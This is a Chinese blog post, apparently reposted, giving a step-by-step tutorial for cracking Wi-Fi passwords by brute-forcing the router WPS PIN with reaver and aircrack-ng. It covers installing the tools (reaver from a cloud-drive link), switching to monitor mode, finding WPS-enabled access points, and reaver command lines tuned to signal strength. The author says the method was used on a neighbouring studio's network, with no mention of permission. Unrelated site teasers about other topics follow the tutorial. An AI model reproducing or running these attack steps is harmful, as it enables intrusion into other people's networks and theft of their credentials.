1. 全栈程序员必看首页

渗透之——使用reaver傻瓜式破解wifi之利用路由器WPS漏洞

全栈程序员-站长 未分类 阅读 58

渗透之——使用reaver傻瓜式破解wifi之利用路由器WPS漏洞跟这篇破解教程一样,网上破解教程多是基于路由器的WPS漏洞破解,但是这样的路由器只占少数。一般wifi是依据WPA/WPA2加密的,因此想要破解一般的wifi,还得破解这个协议,虽然近期这个协议也被破解了,不过也是很不容易的。刚入门破解,不是很熟悉,在网上找各种破解资料,终于破解成功了临近工作室的wifi,沾沾自喜~本文破解wifi针对一些路由器的WPS(Wi-fiprotectedset…

大家好,又见面了,我是你们的朋友全栈君。

跟这篇破解教程一样,网上破解教程多是基于路由器的WPS漏洞破解,但是这样的路由器只占少数。一般wifi是依据WPA/WPA2加密的,因此想要破解一般的wifi,还得破解这个协议,虽然近期这个协议也被破解了,不过也是很不容易的。
刚入门破解,不是很熟悉,在网上找各种破解资料,终于破解成功了临近工作室的wifi,沾沾自喜~
本文破解wifi针对一些路由器的WPS(Wi-fi protected setup)漏洞,尝试很多次抓包PIN码,破解2-3天,正常来说是一定能抓到正确的PIN码的。
一个路由器对应唯一的MAC和PIN,而一旦得到MAC和PIN,通过reaver工具,路由密码等信息就可以很快得出来。
1.安装依赖包:
sudo apt-get install -y libpcap-dev
libsqlite3-dev sqlite3 libpcap0.8-dev libssl-dev build-essential iw tshark subversion
2.安装aircrack-ng:
svn co http://svn.aircrack-ng.org/trunk/ aircrack-ng
cd aircrack-ng/
make (aircrack-ng源码安装参考http://www.tuicool.com/articles/MfUjii)
sudo make install
3.安装reaver:
在https://pan.baidu.com/s/1kUdvM1D下载reaver
tar zxvf reaver-1.4.tar.gz
cd reaver-1.4/src
./configure
make
sudo make install
4.如果安装成功后,会有airmon-ng,airodump-ng,reaver等命令可用(如果没有ethtool,要安装:apt-get install ethtool)
5.开始破解:(参考http://www.she.vc/article/18-108334-0.html http://www.kali.org.cn/thread-20995-1-1.html)
(1)sudo airmon-ng check kill (关闭进程,部分进程可能影响到后续的操作)

Found 4 processes that could cause trouble. 
If airodump-ng, aireplay-ng or airtun-ng stops working after 
a short period of time, you may want to run 'airmon-ng check kill' 

	PID Name 
	431 avahi-daemon 
	446 dhcpcd 
	470 avahi-daemon 
	512 wpa_supplicant

(2)sudo airmon-ng
(3)sudo airmon-ng start wlan1
(4)sudo airmon-ng start wlan1mon (开启网卡,将网卡转换成混杂模式)

PHY Interface Driver Chipset 

phy0 wlan0 brcmfmac_sdio Broadcom 43430 

Missing nexutil, cannot switch to monitor mode. 
phy1 wlan1mon mt7601u Ralink Technology, Corp. 

(mac80211 monitor mode already enabled for [phy1]wlan1mon on [phy1]10)

(5)sudo airodump-ng wlan1mon (查看ap信号强度,破解的wifi信号越强越好)
(6)wash -i wlan1mon -C (查看支持wps的ap)(一种说法是:MB是54e.的可破解,54e不可破解)
6.(正式破解,在root下)使用reaver:
因状况调整参数:MAC即BSSID的值,-c后面的数字是CH的值。
目标信号非常好:
reaver -i wlan1mon -b MAC -a -S -vv -d0 -c 1
目标信号普通:
reaver -i wlan1mon -b MAC -a -S -vv -d2 -t 5 -c 1
目标信号一般:
reaver -i wlan1mon -b MAC -a -S -vv -d5 -c 1
7.每60s重新破解一次,等待三天,密码将会出来
8.最终得到PIN码(WPS PIN)和密码(WPA PSK),如果密码 被改,只要reaver加上-p命令
(reaver -i wlan1mon -b MAC -p PIN码 -vv),密码又能秒出; 但如果PIN码被改,就要重新破解了。
9.破解完成后,将网卡转回正常状态(airmon-ng stop wlan1mon)
渗透之——使用reaver傻瓜式破解wifi之利用路由器WPS漏洞

渗透之——使用reaver傻瓜式破解wifi之利用路由器WPS漏洞

备注:reaver时可以随时停止,它自己会保存进度
升级破解固件http://netsecurity.51cto.com/art/201105/264844_all.htm

 

 

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/145897.html原文链接:https://javaforall.net

(0)
0 0

关于作者

全栈程序员-站长的头像

全栈程序员-站长

133.5K 文章
3 粉丝
本网站汇聚当前互联网主流语音,持续更新,欢迎关注公众号“全栈程序员社区”
上一篇 2022年5月16日 上午11:00
下一篇 2022年5月16日 上午11:00


相关推荐

  • pycharm链接MySQL失败_pycharm连接本地mysql失败

    pycharm链接MySQL失败_pycharm连接本地mysql失败

    pycharm链接MySQL失败_pycharm连接本地mysql失败importpymysq 1 连接本地数据库 2 建立游标 3 创建表 4 插入表数据 查询表数据 更新表数据 删除表数据 defcreate table 连接本地数据库 db pymysql connect localhost root test 创建游标 cursor db cursor 如果存在 student 表 则删除 cursor exe

    全栈程序员-站长的头像 全栈程序员-站长
    2026年3月27日
    2
  • vue项目实现路由按需加载(路由懒加载)的3种方式

    vue项目实现路由按需加载(路由懒加载)的3种方式

    vue项目实现路由按需加载(路由懒加载)的3种方式为什么需要懒加载 像 vue 这种单页面应用 如果没有应用懒加载 运用 webpack 打包后的文件将会异常的大 造成进入首页时 需要加载的内容过多 时间过长 会出啊先长时间的白屏 即使做了 loading 也是不利于用户体验 而运用懒加载则可以将页面进行划分 需要的时候加载页面 可以有效的分担首页所承担的加载压力 减少首页加载用时 vue 异步组件 es 提案的 import webpack

    全栈程序员-站长的头像 全栈程序员-站长
    2026年3月20日
    2
  • Linux切换到root用户

    Linux切换到root用户

    Linux切换到root用户在 Linux 中执行一些操作可能需要 root 用户才有权限操作 可使用 su 命令切换到 root 输入 su 命令并回车 此时会要求输入 root 用户的密码 如果密码正确即可切换成功 在我的 Ubuntu 虚拟机上 提示我谁失败 如下 这有可能是在安装 Ubuntu 系统的时候没有设置 root 账号的密码 可以使用 sudopasswdro 命令来设置 root 账号的密码 密码设置好就可以使用 su 命令来切换到 root 账号了 如下

    全栈程序员-站长的头像 全栈程序员-站长
    2026年3月26日
    2
  • linux卸载docker docker

    linux卸载docker

    linux卸载docker查看 docker 运行状态 systemctlsta 如果显示 active running 状态 则表示 docker 是运行状态 需要执行关闭命令 systemctlsto 查看 yum 安装的 docker 文件包 yumlistinsta grepdocker 查看 docker 相关的 rmp 源文件 rpm qa grepdocker 删除所有安装的 docker 文件包

    全栈程序员-站长的头像 全栈程序员-站长
    2026年3月26日
    0
  • Ceph集群定时Scrub

    Ceph集群定时Scrub

    Ceph集群定时Scrub1 背景 Ceph 集群会定时进行 Scrub 操作 在 Ceph 对接 OpenStack 的场景中 如果 Ceph 集群正在进行 Scrub 操作 会对 Scrub 的数据进行加锁 如果 OpenStack 使用 Ceph 作为后端存储的虚拟机此时也在访问该数据 就会导致 OpenStack 中使用 Ceph 作为后端存储的虚拟机可能会出现卡顿的现象 1 Scurb 是什么 Scrub 是 Ceph 集群副本进行数据扫描的操作 用以检测

    全栈程序员-站长的头像 全栈程序员-站长
    2026年3月18日
    2
  • 非主流免费播放器|免费QQ空间播放器代码|非主流播放器

    非主流免费播放器|免费QQ空间播放器代码|非主流播放器

    非主流免费播放器|免费QQ空间播放器代码|非主流播放器 script type=”text/javascript”>…google_ad_client = “pub-2372065995666058”;/**//* btttttttttttt */google_ad_slot = “7097305745”;google_ad_width = 468;google_ad_height = 15;//–>script>script type

    全栈程序员-站长的头像 全栈程序员-站长
    2022年10月9日
    5

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号